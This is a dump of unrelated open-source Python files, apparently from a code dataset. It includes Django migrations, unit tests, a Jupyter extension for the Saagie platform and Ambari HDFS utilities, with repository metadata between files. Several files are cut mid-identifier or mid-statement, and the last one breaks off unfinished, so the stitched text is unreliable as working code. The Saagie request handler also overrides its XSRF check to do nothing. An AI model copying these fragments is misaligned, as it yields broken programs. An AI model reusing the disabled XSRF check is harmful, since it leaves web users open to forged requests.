deprecated.', my_format_registry.get_help('deprecated')) def test_help_topic(self): topics = help_topics.HelpTopicRegistry() registry = self.make_format_registry() topics.register('current-formats', registry.help_topic, 'Current formats') topics.register('other-formats', registry.help_topic, 'Other formats') new = topics.get_detail('current-formats') rest = topics.get_detail('other-formats') experimental, deprecated = rest.split('Deprecated formats') self.assertContainsRe(new, 'formats-help') self.assertContainsRe(new, ':knit:\n \(native\) \(default\) Format using knits\n') self.assertContainsRe(experimental, ':branch6:\n \(native\) Experimental successor to knit') self.assertContainsRe(deprecated, ':lazy:\n \(native\) Format registered lazily\n') self.assertNotContainsRe(new, 'hidden') def test_set_default_repository(self): default_factory = controldir.format_registry.get('default') old_default = [k for k, v in controldir.format_registry.iteritems() if v == default_factory and k != 'default'][0] controldir.format_registry.set_default_repository('dirstate-with-subtree') try: self.assertIs(controldir.format_registry.get('dirstate-with-subtree'), controldir.format_registry.get('default')) self.assertIs( repository.format_registry.get_default().__class__, knitrepo.RepositoryFormatKnit3) finally: controldir.format_registry.set_default_repository(old_default) def test_aliases(self): a_registry = controldir.ControlDirFormatRegistry() a_registry.register('deprecated', DeprecatedBzrDirFormat, 'Old format. Slower and does not support stuff', deprecated=True) a_registry.register('deprecatedalias', DeprecatedBzrDirFormat, 'Old format. Slower and does not support stuff', deprecated=True, alias=True) self.assertEqual(frozenset(['deprecatedalias']), a_registry.aliases()) class SampleBranch(bzrlib.branch.Branch): """A dummy branch for guess what, dummy use.""" def __init__(self, dir): self.bzrdir =
GeorgiaTechDHLab/TOME
news/migrations/0004_auto_20170307_0605.py
Python
bsd-3-clause
1,746
0.004009
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-03-07 06:05 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('news', '0003_auto_20170228_2249'), ] operations = [ migrations.CreateModel( name='Location', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('city', models.CharField(default='Testville', max_length=200)), ('state', models.CharField(default='Montigania', max_length=200)), ], ), migrations.AddField( model_name='newspaper', name='next_paper', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AddField( model_name='newspaper', name='prev_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AlterField( model_name='newspaper', name='date_ended', field=models.DateField(blank=True, null=True, verbose_name='date ended'), ), migrations.AlterUniqueTogether( name='location', unique_together=set([('city', 'state')]), ), migrations.AddField(
model_name='newspaper', name='location', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'), ), ]
Bismarrck/pymatgen
pymatgen/io/aseio.py
Python
mit
594
0.003367
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. #!/usr/bin/env python from __future__ i
mport division, unicode_literals """ #TODO: Write module doc. """ __author__ = 'Shyue Ping Ong' __copyright__ = 'Copyright 2013, The Materials Virtual Lab' __version__ = '0.1' __maintainer__ = 'Shyue Ping Ong' __email_
_ = 'ongsp@ucsd.edu' __date__ = '8/1/15' import warnings warnings.warn("pymatgen.io.aseio has been moved pymatgen.io.ase. This stub " "will be removed in pymatgen 4.0.", DeprecationWarning) from .ase import *
jlanga/exfi
tests/test_io/test_read_gfa.py
Python
mit
2,975
0.000672
#!/usr/bin/env python3 """tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py""" from unittest import TestCase, main from exfi.io.read_gfa import read_gfa1 from tests.io.gfa1 import \ HEADER, \ SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \ SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \ LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \ CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \ PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \ GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \ GFA1_COMPLEX_SOFT_FN, GFA1_COM
PLE
X_HARD_FN class TestReadGFA1(TestCase): """Tests for exfi.io.read_gfa.read_gfa1""" def test_empty(self): """exfi.io.read_gfa.read_gfa1: empty case""" gfa1 = read_gfa1(GFA1_EMPTY_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_EMPTY)) self.assertTrue(gfa1['links'].equals(LINKS_EMPTY)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_EMPTY)) self.assertTrue(gfa1['paths'].equals(PATHS_EMPTY)) def test_simple(self): """exfi.io.read_gfa.read_gfa1: simple case""" gfa1 = read_gfa1(GFA1_SIMPLE_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_SIMPLE)) self.assertTrue(gfa1['links'].equals(LINKS_SIMPLE)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_SIMPLE)) self.assertTrue(gfa1['paths'].equals(PATHS_SIMPLE)) def test_complex(self): """exfi.io.read_gfa.read_gfa1: complex case""" gfa1 = read_gfa1(GFA1_COMPLEX_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_soft(self): """exfi.io.read_gfa.read_gfa1: complex and soft masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_SOFT_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_SOFT)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_hard(self): """exfi.io.read_gfa.read_gfa1: complex and hard masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_HARD_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_HARD)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) if __name__ == '__main__': main()
nextgis/nextgisweb_compulink
nextgisweb_compulink/db_migrations/update_actual_lyr_names.py
Python
gpl-2.0
1,646
0.003645
# coding=utf-8 import json import codecs import os import transaction from nextgisweb import DBSession from nextgisweb.vector_layer import VectorLayer from nextgisweb_compulink.compulink_admin.model import BASE_PATH def update_actual_lyr_names(args): db_session = DBSession() transaction.manager.begin() # what update upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point', 'real_optical_cross', 'real_special_transition', 'real_special_transition_point'] upd_real_lyr_names = {
} # new names (already in templates!) real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/') for up_lyr_name in upd_real_layers: with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file: json_layer_struct = json.load(json_file, encoding='utf-8') new_name = json_layer_struct['resource']['display_name']
upd_real_lyr_names[up_lyr_name] = new_name # update now resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all() for vec_layer in resources: lyr_name = vec_layer.keyname if not lyr_name: continue for up_lyr_name in upd_real_lyr_names.keys(): if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly! vec_layer.display_name = upd_real_lyr_names[up_lyr_name] print '%s updated' % lyr_name break transaction.manager.commit() db_session.close()
schleichdi2/OPENNFR-6.3-CORE
opennfr-openembedded-core/meta/lib/oeqa/sdk/cases/gcc.py
Python
gpl-2.0
1,658
0.009047
# # SPDX-License-Identifier: MIT # import os import shutil import unittest from oeqa.core.utils.path import remove_safe from oeqa.sdk.case import OESDKTestCase from oeqa.utils.subprocesstweak import errors_have_output errors_have_output() class GccCompileTest(OESDKTestCase): td_vars = ['MACHINE'] @classmethod def setUpClass(self): files = {'test.c' : self.tc.files_dir,
'test.cpp' : self.tc.files_dir, 'testsdkmakefile' : self.tc.sdk_files_dir} for f in files: shutil.copyfile(os.path.join(files[f], f), os.path.join(self.tc.sdk_dir, f)) def setUp(self): machine = self.td.get("MACHINE") if not (self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine) or self.tc.hasHostPackage("^gcc-", regex=True)):
raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain") def test_gcc_compile(self): self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp_compile(self): self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp2_compile(self): self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_make(self): self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir) @classmethod def tearDownClass(self): files = [os.path.join(self.tc.sdk_dir, f) \ for f in ['test.c', 'test.cpp', 'test.o', 'test', 'testsdkmakefile']] for f in files: remove_safe(f)
JulianNicholls/Complete-Web-Course-2.0
13-Python/challenge2.py
Python
mit
249
0.012048
#!
/usr/bin/env python3 print('Content-type: text/html') print() primes = [2, *range(3, 10001, 2)] for div in primes: idx = div + 1 while(idx < len(primes)): if (primes[idx] % div == 0): del primes
[idx] idx += 1 print(primes)
EmanueleCannizzaro/scons
test/SWIG/SWIGOUTDIR.py
Python
mit
2,897
0.005178
#!/usr/bin/env python # # Copyright (c) 2001 - 2016 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog" """ Verify that use of the $SWIGOUTDIR variable causes SCons to recognize that Java files are created in the specified output directory. """ import TestSCons test = TestSCons.TestSCons() swig = test.where_is('swig') if not swig: test.skip_test('Can not find installed "swig", skipping test.\n') where_java_include=test.java_where_includes() if not where_java_include: test.skip_test('Can not find installed Java include files, skipping test.\n') test.write(['SConstruct'], """\ env = Environment(tools = ['default', 'swig'], CPPPATH=%(where_java_include)s, ) Java_foo_interface = env.SharedLibrary( 'Java_foo_interface', 'Java_foo_interface.i'
, SWIGOUTDIR = 'java/build dir', SWIGFLAGS = '-c++ -java -Wall', SWIGCXXFILES
UFFIX = "_wrap.cpp") """ % locals()) test.write('Java_foo_interface.i', """\ %module foopack """) # SCons should realize that it needs to create the "java/build dir" # subdirectory to hold the generated .java files. test.run(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') # SCons should remove the built .java files. test.run(arguments = '-c') test.must_not_exist('java/build dir/foopackJNI.java') test.must_not_exist('java/build dir/foopack.java') # SCons should realize it needs to rebuild the removed .java files. test.not_up_to_date(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') test.pass_test() # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
jerome-jacob/selenium
py/test/selenium/webdriver/firefox/ff_select_support_class_tests.py
Python
apache-2.0
1,419
0.002819
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC
licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from selenium import webdriver from selenium.test.selenium.webdriver.common import select_class_tests from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer def setup_module(module): webserver = SimpleWebServer() webserver.start() FirefoxSelectElementHandlingTests.webserver = webserver FirefoxSelectElementHandlingTests.driver = webdriver.Firefox() class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests): pass def teardown_module(module): FirefoxSelectElementHandlingTests.driver.quit() FirefoxSelectElementHandlingTests.webserver.stop()
billychow/simplelifestream
worker.py
Python
mit
1,047
0.029608
from google.appengine.ext import webapp from google.appengine.ext.webapp import util from google.appengine.api.labs import taskqueue from google.appengine.api import memcache from lifestream import * class LifeStr
eamQueueWorker(webapp.RequestHandler): def get(self): memcache.set('fresh_count', 0) indexes = LifeStream.instance().indexes
for index in indexes: taskqueue.add(url='/app_worker/task', method='GET', params={'index':index}) taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10) class LifeStreamTaskWorker(webapp.RequestHandler): def get(self): index = int(self.request.get('index')) LifeStream.update_feed(index) class LifeStreamRefreshWorker(webapp.RequestHandler): def get(self): LifeStream.refresh_stream() def main(): application = webapp.WSGIApplication([ ('/app_worker/queue', LifeStreamQueueWorker), ('/app_worker/task', LifeStreamTaskWorker), ('/app_worker/refresh', LifeStreamRefreshWorker) ], debug=True) util.run_wsgi_app(application) if __name__ == '__main__': main()
saagie/jupyter-saagie-plugin
saagie/server_extension.py
Python
apache-2.0
16,090
0.00174
from functools import wraps import json import os import traceback import validators from jinja2 import Environment, PackageLoader from notebook.utils import url_path_join from notebook.base.handlers import IPythonHandler import requests from requests.auth import HTTPBasicAuth env = Environment( loader=PackageLoader('saagie', 'jinja2'), ) SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None) SAAGIE_USERNAME = None PLATFORMS_URL = None SAAGIE_BASIC_AUTH_TOKEN = None JOBS_URL_PATTERN = None JOB_URL_PATTERN = None JOB_UPGRADE_URL_PATTERN = None SCRIPT_UPLOAD_URL_PATTERN = None def get_absolute_saagie_url(saagie_url): if saagie_url.startswith('/'): return SAAGIE_ROOT_URL + saagie_url return saagie_url class ResponseError(Exception): def __init__(self, status_code): self.status_code = status_code super(ResponseError, self).__init__(status_code) class SaagieHandler(IPythonHandler): def handle_request(self, method): data = {k: v[0].decode() for k, v in self.request.arguments.items()} if 'view' not in data: self.send_error(404) return view_name = data.pop('view') notebook_path = data.pop('notebook_path', None) notebook_json = data.pop('notebook_json', None) notebook = Notebook(notebook_path, notebook_json) try: template_name, template_data = views.render( view_name, notebook=notebook, data=data, method=method) except ResponseError as e: self.send_error(e.status_code) return except: template_name = 'internal_error.html' template_data = {'error': traceback.format_exc()} self.set_status(500) template_data.update( notebook=notebook, ) template = env.get_template(template_name) self.finish(template.render(template_data)) def get(self): self.handle_request('GET') def post(self): self.handle_request('POST')
def check_xsrf_cookie(self): return
class SaagieCheckHandler(IPythonHandler): def get(self): self.finish() class SaagieJobRun: def __init__(self, job, run_data): self.job = job self.id = run_data['id'] self.status = run_data['status'] self.stderr = run_data.get('logs_err', '') self.stdout = run_data.get('logs_out', '') class SaagieJob: @classmethod def from_id(cls, notebook, platform_id, job_id): return SaagieJob( notebook, requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json()) def __init__(self, notebook, job_data): self.notebook = notebook self.data = job_data self.platform_id = job_data['platform_id'] self.capsule_type = job_data['capsule_code'] self.id = job_data['id'] self.name = job_data['name'] self.last_run = None def set_as_current(self): self.notebook.current_job = self @property def url(self): return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id) @property def admin_url(self): return get_absolute_saagie_url('/#/manager/%s/job/%s' % (self.platform_id, self.id)) @property def logs_url(self): return self.admin_url + '/logs' @property def is_started(self): return self.last_run is not None def fetch_logs(self): job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json() run_data = job_data.get('last_instance') if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'): return run_data = requests.get( get_absolute_saagie_url('/api/v1/jobtask/%s' % run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json() self.last_run = SaagieJobRun(self, run_data) @property def details_template_name(self): return 'include/python_job_details.html' def __str__(self): return self.name def __eq__(self, other): if other is None: return False return self.platform_id == other.platform_id and self.id == other.id def __lt__(self, other): if other is None: return False return self.id < other.id class SaagiePlatform: SUPPORTED_CAPSULE_TYPES = {'python'} def __init__(self, notebook, platform_data): self.notebook = notebook self.id = platform_data['id'] self.name = platform_data['name'] self.capsule_types = {c['code'] for c in platform_data['capsules']} @property def is_supported(self): return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES) def get_jobs(self): if not self.is_supported: return [] jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json() return [SaagieJob(self.notebook, job_data) for job_data in jobs_data if job_data['category'] == 'processing' and job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES] def __eq__(self, other): return self.id == other.id class Notebook: CACHE = {} def __new__(cls, path, json): if path in cls.CACHE: return cls.CACHE[path] cls.CACHE[path] = new = super(Notebook, cls).__new__(cls) return new def __init__(self, path, json_data): if path is None: path = 'Untitled.ipynb' if json_data is None: json_data = json.dumps({ 'cells': [], 'metadata': {'kernelspec': {'name': 'python3'}}}) self.path = path self.json = json.loads(json_data) # In cached instances, current_job is already defined. if not hasattr(self, 'current_job'): self.current_job = None @property def name(self): return os.path.splitext(os.path.basename(self.path))[0] @property def kernel_name(self): return self.json['metadata']['kernelspec']['name'] @property def kernel_display_name(self): return self.json['metadata']['kernelspec']['display_name'] def get_code_cells(self): return [cell['source'] for cell in self.json['cells'] if cell['cell_type'] == 'code'] def get_code(self, indices=None): cells = self.get_code_cells() if indices is None: indices = list(range(len(cells))) return '\n\n\n'.join([cells[i] for i in indices]) def get_platforms(self): return [SaagiePlatform(self, platform_data) for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()] class ViewsCollection(dict): def add(self, func): self[func.__name__] = func return func def render(self, view_name, notebook, data=None, method='GET', **kwargs): if data is None: data = {} try: view = views[view_name] except KeyError: raise ResponseError(404) template_data = view(method, notebook, data, **kwargs) if isinstance(template_data, tuple): template_name, template_data = template_data else: template_name = view.__name__ + '.html' return template_name, template_data views = ViewsCollection() @views.add def modal(method, notebook, data): return {} def clear_basic_auth_token(): global SAAGIE_BASIC_AUTH_TOKEN SAAGIE_BASIC_AUTH_TOKEN = None # Init an empty Basic Auth token on first launch clear_basic_auth_token() def is_logged(): if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None: return False else: # Check if Basic token is still valid is_logged_in = False try: response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False) is_logged_in = response.ok except (requests.ConnectionError, requests.RequestException, requests.HTTPError
pinax/pinax-blog
pinax/blog/migrations/0007_auto_20161223_1013.py
Python
mit
752
0.00266
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2016-12-23 10:13 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('blog', '0006_auto_20160321_1527'), ] operations = [ migrations.CreateModel( name='Blog', fields=[ ('id', models.AutoField(auto_creat
ed=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.AddField( model_name='post', name='blog', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.Blog'), ),
]
watchdogpolska/feder
feder/cases/migrations/0016_auto_20211021_0245.py
Python
mit
423
0
# Generated by Django 2.2.24 on 2021-1
0-21 02:45 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("cases", "0015_case_is_quarantied"), ] operations = [ migrations.AddIndex( model_name="case", index=models.Index(
fields=["created"], name="cases_case_created_a615f3_idx" ), ), ]
daynesh/ffstats
ffstats/wsgi.py
Python
apache-2.0
1,422
0.000703
""" WSGI config for ffstats project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense
to replace the whole Dja
ngo WSGI application with a custom one that later delegates to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ffstats.settings") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application)
danmar/cppcheck
tools/listErrorsWithoutCWE.py
Python
gpl-3.0
710
0.005634
#!/usr/bin/env python from __future__ import print_function import argparse import xml.etree.ElementTree as ET def main(): parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format") parser.add_argument("-F", metavar="filename", required=True, help="XML file containing output from: ./cppcheck --errorlist --xml-version=2") parsed = parser.parse_args() tree = ET.parse(vars(parsed)["F"]) root = tree.getroot() for chil
d in root.iter("error"): if "cwe" not in child.attrib: print(child.attrib["id"], c
hild.attrib["severity"], child.attrib["verbose"], sep=", ") if __name__ == "__main__": main()
evildmp/django-curated-resources
curated_resources/filters.py
Python
bsd-2-clause
336
0.02381
import django_filters from .models import Resource class Reso
urceFilter(django_filters.FilterSet): class Meta: model = Resource fields = [ 'title', 'description', 'domains', 'topics', 'resource_type', 'suitable_for',
]
jonathansick/Ssstat
ssstat/download.py
Python
bsd-2-clause
1,488
0.008065
#!/usr/bin/env python # encoding: utf-8 """ Download command for ssstat--download logs without adding to MongoDB. 2012-11-18 - Created by Jonathan Sick """ import os import logging from cliff.command import Command import ingest_core class DownloadCommand(Command): """ssstat download""" log = logging.getLogger(__name__) def get_parser(self, progName): """Adds command line options.""" parser = super(DownloadCommand, self).get_parser(progName) parser.add_argument('log_bucket', help='Name of S3 Logging Bucket') parser.add_argument('prefix', help='Prefix for the desired log files') parser.add_argument('--cache-dir', default=os.path.expandvars("$HOME/.ssstat/cache"), action='store', dest='cache_dir', help='Local directory
where logs are cached') parser.add_argument('--delete', dest='delete', default=True, type=bool, help='Delete downloaded logs from S3') return parser def take_action(self, parsedArgs): """Runs the `ssstat do
wnload` command pipeline.""" self.log.debug("Running ssstat download") # Downloads logs into root of cache directory ingest_core.download_logs(parsedArgs.log_bucket, parsedArgs.prefix, parsedArgs.cache_dir, delete=parsedArgs.delete) def main(): pass if __name__ == '__main__': main()
zeptonaut/catapult
perf_insights/perf_insights/local_directory_corpus_driver_unittest.py
Python
bsd-3-clause
531
0.003766
# Copyright (c) 2015 The Chromium Authors. Al
l rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import unittest from perf_insights import local_directory_corpus_driver class LocalDirectoryCorpusDriverTests(unittest.TestCase): def testTags(self): self.assertEquals( local_directory_corpus_d
river._GetTagsForRelPath('a.json'), []) self.assertEquals( local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'), ['b', 'c'])
alexryndin/ambari
ambari-server/src/main/resources/stacks/ADH/1.0/services/HDFS/package/scripts/utils.py
Python
apache-2.0
16,170
0.013296
""" Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os import re import urllib2 import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set. from resource_manage
ment.core.resources.system import Directory, File, Execute from resource_management.libraries.functions.format import format from resource_management
.libraries.functions import check_process_status from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.core import shell from resource_management.core.shell import as_user, as_sudo from resource_management.core.source import Template from resource_management.core.exceptions import ComponentIsNotRunning from resource_management.core.logger import Logger from resource_management.libraries.functions.curl_krb_request import curl_krb_request from resource_management.libraries.script.script import Script from resource_management.libraries.functions.namenode_ha_utils import get_namenode_states from resource_management.libraries.functions.show_logs import show_logs from ambari_commons.inet_utils import ensure_ssl_using_protocol from zkfc_slave import ZkfcSlaveDefault ensure_ssl_using_protocol( Script.get_force_https_protocol_name(), Script.get_ca_cert_file_path() ) def safe_zkfc_op(action, env): """ Idempotent operation on the zkfc process to either start or stop it. :param action: start or stop :param env: environment """ Logger.info("Performing action {0} on zkfc.".format(action)) zkfc = None if action == "start": try: ZkfcSlaveDefault.status_static(env) except ComponentIsNotRunning: ZkfcSlaveDefault.start_static(env) if action == "stop": try: ZkfcSlaveDefault.status_static(env) except ComponentIsNotRunning: pass else: ZkfcSlaveDefault.stop_static(env) def initiate_safe_zkfc_failover(): """ If this is the active namenode, initiate a safe failover and wait for it to become the standby. If an error occurs, force a failover to happen by killing zkfc on this host. In this case, during the Restart, will also have to start ZKFC manually. """ import params # Must kinit before running the HDFS command if params.security_enabled: Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"), user = params.hdfs_user) active_namenode_id = None standby_namenode_id = None active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user) if active_namenodes: active_namenode_id = active_namenodes[0][0] if standby_namenodes: standby_namenode_id = standby_namenodes[0][0] if active_namenode_id: Logger.info(format("Active NameNode id: {active_namenode_id}")) if standby_namenode_id: Logger.info(format("Standby NameNode id: {standby_namenode_id}")) if unknown_namenodes: for unknown_namenode in unknown_namenodes: Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0])) if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id: # Failover if this NameNode is active and other NameNode is up and in standby (i.e. ready to become active on failover) Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby")) failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}") check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby") msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname) Logger.info(msg) code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - failover command returned {code}")) wait_for_standby = False if code == 0: wait_for_standby = True else: # Try to kill ZKFC manually was_zkfc_killed = kill_zkfc(params.hdfs_user) code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - check for standby returned {code}")) if code == 255 and out: Logger.info("Rolling Upgrade - NameNode is already down.") else: if was_zkfc_killed: # Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover. wait_for_standby = True if wait_for_standby: Logger.info("Waiting for this NameNode to become the standby one.") Execute(check_standby_cmd, user=params.hdfs_user, tries=50, try_sleep=6, logoutput=True) else: msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname) Logger.info(msg) def kill_zkfc(zkfc_user): """ There are two potential methods for failing over the namenode, especially during a Rolling Upgrade. Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it. Option 2. Silent failover :param zkfc_user: User that started the ZKFC process. :return: Return True if ZKFC was killed, otherwise, false. """ import params if params.dfs_ha_enabled: if params.zkfc_pid_file: check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user) code, out = shell.call(check_process) if code == 0: Logger.debug("ZKFC is running and will be killed.") kill_command = format("kill -15 `cat {zkfc_pid_file}`") Execute(kill_command, user=zkfc_user ) File(params.zkfc_pid_file, action = "delete", ) return True return False def service(action=None, name=None, user=None, options="", create_pid_dir=False, create_log_dir=False): """ :param action: Either "start" or "stop" :param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc" :param user: User to run the command as :param options: Additional options to pass to command as a string :param create_pid_dir: Create PID directory :param create_log_dir: Crate log file directory """ import params options = options if options else "" pid_dir = format("{hadoop_pid_dir_prefix}/{user}") pid_file = 